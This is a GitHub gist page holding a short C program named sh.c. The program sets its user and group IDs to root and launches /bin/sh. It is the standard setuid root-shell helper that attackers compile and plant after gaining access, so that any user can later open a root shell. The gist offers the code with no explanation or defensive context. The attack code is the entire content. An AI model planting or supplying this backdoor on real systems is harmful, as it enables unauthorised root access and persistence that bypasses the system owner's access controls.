Skip to content

Instantly share code, notes, and snippets.

@prachauthit
Forked from anonymous/sh.c
Created January 20, 2017 05:22
Show Gist options
  • Save prachauthit/6d336d2dd65a33fcee88b10983f22401 to your computer and use it in GitHub Desktop.
Save prachauthit/6d336d2dd65a33fcee88b10983f22401 to your computer and use it in GitHub Desktop.
#include <stdio.h>
int main()
{
setuid(0);
setgid(0);
system("/bin/sh");
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment